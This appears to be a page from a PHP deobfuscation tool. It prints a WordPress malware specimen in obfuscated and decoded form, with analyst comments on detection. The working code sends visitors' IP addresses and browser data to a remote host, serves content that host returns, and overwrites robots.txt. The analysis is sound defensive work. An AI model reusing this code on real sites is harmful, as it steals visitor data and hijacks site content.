
PHP deobfuscation, decryption, reconstruction tool

De-obfuscates PHP malware, viruses and tampered code found on WordPress sites back into the original, readable code.

*Please note that not all obfuscated code can be decoded.

The code below has been decoded.

<?php ErROr_rEPOrTiNg(RoUNd(0+0+0+0+0)); $wScbRh="z\152\61\63\60\63"; $qzwdV="s\171\61"; if(PREg_mAtch("/\152\160\62\60\62\63/s\151",$_SERVER["\122EQU\105ST_\125\122I"])==RouND(0.16633+0.1230147+0.0884+0.22813+0.0903841+0.12995+0.1738)) { if(PrEG_matCH("\57jp\62\60\62\63cw\167\57\163i",$_SERVER["...



Obfuscated PHP code

<?php /*
 * Obfuscated specimen, reproduced byte-for-byte (only this comment is added).
 * Three obfuscation layers are visible in the text:
 *   - string literals mix plain characters with octal escapes (e.g. "\152" is "j"),
 *     so hostnames, $_SERVER keys and regex patterns do not appear as plain text;
 *   - integer constants are written as RoUNd() of a sum of floats;
 *   - built-in function names use random letter case, which PHP accepts because
 *     function names are resolved case-insensitively.
 * Triage note: plain-text searches for the hostname or for "robots.txt" will not
 * match this form; searching PHP files for dense octal escapes or round() over
 * float sums is a more reliable starting point.
 */ ErROr_rEPOrTiNg(RoUNd(0+0+0+0+0)); $wScbRh="z\152\61\63\60\63"; $qzwdV="s\171\61"; if(PREg_mAtch("/\152\160\62\60\62\63/s\151",$_SERVER["\122EQU\105ST_\125\122I"])==RouND(0.16633+0.1230147+0.0884+0.22813+0.0903841+0.12995+0.1738)) { if(PrEG_matCH("\57jp\62\60\62\63cw\167\57\163i",$_SERVER["\122EQU\105ST_\125\122I"])==RounD(0+0+0+0+0+0+0)) { HEADer("\110TTP\57\61\56\60\40\64\60\64 \116\157t \106\157\165\156d"); } echo "HT\124P\57\61\56\60\40\64\60\64 No\164 Fo\165\156d_\137\137".$wScbRh."__\137".$qzwdV; exit; } $VBp="\150\164\164p\72/\57".$wScbRh."\56j\145wi\163hl\145av\145\56co\155"; $VFx="\57i\156d\145x\56\160\150p\77\126\123\75".$qzwdV."\46G\120\75".$wScbRh; $rQx=array( "\123CRI\120\124\137NAME", "\122EQU\105ST_\125\122I", "\110T\124\120\123", "R\105Q\125\105ST\137\123C\110EM\105", "\123ERV\105R\137P\117R\124", "REM\117TE_\101DD\122", "H\124T\120\137R\105\106E\122E\122", "H\124T\120\137A\103CE\120T_LA\116GUAG\105", "H\124TP\137\125SE\122\137\101\107\105\116T", "HT\124P\137\110O\123T" ); foreach($rQx as $Rv) { $wQvS=isset($_SERVER[$Rv])?$_SERVER[$Rv]:''; $VyYq=baSE64_ENcOdE(TRIM($wQvS)); $VyYq=Str_rEplaCE("\53","\55",$VyYq); $VyYq=sTr_RePlace("\57","\137",$VyYq); $VyYq=str_rEPLace("=","\56",$VyYq); $VFx.="\46".$Rv."=".$VyYq; } $cft=$VBp.$VFx; $nH=CUrl_InIt(); curL_SEtoPT($nH,CURLOPT_URL,$cft); CurL_sEToPT($nH,CURLOPT_RETURNTRANSFER,ROund(0.38886311+0.1183295+0.1847+0.308121)); cURl_SetoPT($nH,CURLOPT_CONNECTTIMEOUT,ROUnD(1.774809+1.12595+2.360051+0.394402+4.34478372)); $lzq=Curl_exEC($nH); $lzq=TRIM($lzq); cuRL_CLoSe($nH); if(empty($lzq)) { $lzq=fILE_Get_conteNtS($cft); } $lzq=tRiM($lzq); $COZUy=EXploDE("|@\43$\174",$lzq); $lwPb=COunt($COZUy); if($lwPb<3) { heADeR("\110TTP\57\61\56\60\40\64\60\64 \116\157t \106\157\165\156d"); exit; }else { $wSrkv=tRIm($COZUy[rOUnd(0+0+0+0+0+0+0+0)]); if(!empty($wSrkv)) { hEadeR($wSrkv); } $RCpH=trIm($COZUy[ROund(0.013+0.4176062+0.411101+0.01344319+0.145)]); if(!empty($RCpH)) { echo $RCpH; } 
$Tr=tRIM($COZUy[$lwPb-RoUnD(0.116+0.328+0.557)]); if($Tr=="e\170it") { exit; } if($Tr=="p\151\156g") { $YdpAT="\125se\162-a\147ent:\52".PHP_EOL; $YdpAT.="Allow\72\57".PHP_EOL; $Aam=ExPlOde("<br\57>",$RCpH); aRRAY_pOP($Aam); foreach($Aam as $Cblrq) { $YdpAT.="\123it\145\155\141p:".$Cblrq.PHP_EOL; } $LOQAGb=FOpeN($_SERVER["D\117\103\125\115\105\116T_\122O\117T"]."\57r\157\142o\164s\56t\170\164","\167"); FwritE($LOQAGb,$YdpAT); FclOSe($LOQAGb); echo "r\157bo\164\163.t\170t\40d\157ne"; exit; } } ?>

Decoded (de-obfuscated) PHP code

<?php

// Decoder output for the obfuscated specimen shown on this page; code is left
// exactly as the tool printed it and only these analyst comments are added.
// Observed flow: (1) answer a marker request, (2) send request/visitor data to
// a remote host, (3) emit the header and body that host returns, (4) on
// command, overwrite the site's robots.txt.
// NOTE(review): this behaviour is consistent with SEO-spam cloaking; the page
// itself does not name a malware family.
// Function names keep their random letter case because PHP resolves function
// names case-insensitively, so signature matching must be case-insensitive.

// Level 0: PHP error reporting is switched off for the rest of the request.
ErROr_rEPOrTiNg(RoUNd(0));
// Two hard-coded identifiers; they are reused below as the subdomain label and
// as the GP / VS query parameters.
$wScbRh = "zj1303";
$qzwdV = "sy1";
// Marker request: any URI containing "jp2023" (case-insensitive) is answered
// with a body that embeds both identifiers, then the script stops. A real 404
// status header is sent only when the URI does not also contain "jp2023cww".
// Detection: "jp2023" in access-log URIs, or response bodies beginning with
// "HTTP/1.0 404 Not Found___".
if (PREg_mAtch("/jp2023/si", $_SERVER["REQUEST_URI"]) == RouND(1.0000088)) {
    if (PrEG_matCH("/jp2023cww/si", $_SERVER["REQUEST_URI"]) == RounD(0)) {
        HEADer("HTTP/1.0 404 Not Found");
    }
    echo "HTTP/1.0 404 Not Found___" . $wScbRh . "___" . $qzwdV;
    exit;
}
// Remote endpoint, reached over plain HTTP (no transport protection, no server
// authentication). Outbound requests from the web server to this host are a
// network-level indicator.
$VBp = "http://" . $wScbRh . ".jewishleave.com";
$VFx = "/index.php?VS=" . $qzwdV . "&GP=" . $wScbRh;
// $_SERVER keys forwarded on every request: they include the visitor's IP
// address, user agent, referer and language, plus the host and requested URI.
$rQx = array("SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST");
foreach ($rQx as $Rv) {
    // Missing keys are sent as an empty string.
    $wQvS = isset($_SERVER[$Rv]) ? $_SERVER[$Rv] : '';
    // Base64 with "+", "/" and "=" replaced by "-", "_" and "." before the
    // value is appended as "&KEY=value".
    $VyYq = baSE64_ENcOdE(TRIM($wQvS));
    $VyYq = Str_rEplaCE("+", "-", $VyYq);
    $VyYq = sTr_RePlace("/", "_", $VyYq);
    $VyYq = str_rEPLace("=", ".", $VyYq);
    $VFx .= "&" . $Rv . "=" . $VyYq;
}
$cft = $VBp . $VFx;
// Fetch the URL with cURL: the body is returned as a string
// (CURLOPT_RETURNTRANSFER = 1) and the connect timeout rounds to 10 seconds.
$nH = CUrl_InIt();
curL_SEtoPT($nH, CURLOPT_URL, $cft);
CurL_sEToPT($nH, CURLOPT_RETURNTRANSFER, ROund(1.0000136099999999));
cURl_SetoPT($nH, CURLOPT_CONNECTTIMEOUT, ROUnD(9.999995719999999));
$lzq = Curl_exEC($nH);
$lzq = TRIM($lzq);
cuRL_CLoSe($nH);
// Second attempt through file_get_contents() when cURL produced nothing.
if (empty($lzq)) {
    $lzq = fILE_Get_conteNtS($cft);
}
$lzq = tRiM($lzq);
// Response format: fields separated by the literal string "|@#$|".
$COZUy = EXploDE("|@#\$|", $lzq);
$lwPb = COunt($COZUy);
if ($lwPb < 3) {
    // Fewer than three fields: answer with a 404 and stop.
    heADeR("HTTP/1.0 404 Not Found");
    exit;
} else {
    // From here on, what the visitor receives is chosen by the remote host.
    // Field 0, if non-empty, is passed to header() as a raw header line.
    $wSrkv = tRIm($COZUy[rOUnd(0)]);
    if (!empty($wSrkv)) {
        hEadeR($wSrkv);
    }
    // Field 1, if non-empty, is echoed into the response without escaping.
    $RCpH = trIm($COZUy[ROund(1.00015039)]);
    if (!empty($RCpH)) {
        echo $RCpH;
    }
    // The last field is a command word: "exit" or "ping".
    $Tr = tRIM($COZUy[$lwPb - RoUnD(1.0010000000000001)]);
    if ($Tr == "exit") {
        exit;
    }
    if ($Tr == "ping") {
        // NOTE(review): decoder artifact on the next two lines. The obfuscated
        // original concatenates the PHP_EOL constant ("User-agent:*".PHP_EOL,
        // then .= "Allow:/".PHP_EOL); the decoder folded the constant's name
        // into the string literals and turned ".=" into "=". Treat the
        // obfuscated original as authoritative for these two statements.
        $YdpAT = "User-agent:*PHP_EOL";
        $YdpAT = "User-agent:*PHP_EOLAllow:/PHP_EOL";
        // Field 1 is split on "<br/>"; the last piece is dropped and each
        // remaining piece becomes a "Sitemap:" line.
        $Aam = ExPlOde("<br/>", $RCpH);
        aRRAY_pOP($Aam);
        foreach ($Aam as $Cblrq) {
            $YdpAT .= "Sitemap:" . $Cblrq . PHP_EOL;
        }
        // Mode "w" truncates and replaces DOCUMENT_ROOT/robots.txt; the fopen()
        // result is not checked. Detection: an unexpected robots.txt change
        // (content or modification time) with remotely supplied Sitemap lines.
        $LOQAGb = FOpeN($_SERVER["DOCUMENT_ROOT"] . "/robots.txt", "w");
        FwritE($LOQAGb, $YdpAT);
        FclOSe($LOQAGb);
        echo "robots.txt done";
        exit;
    }
}

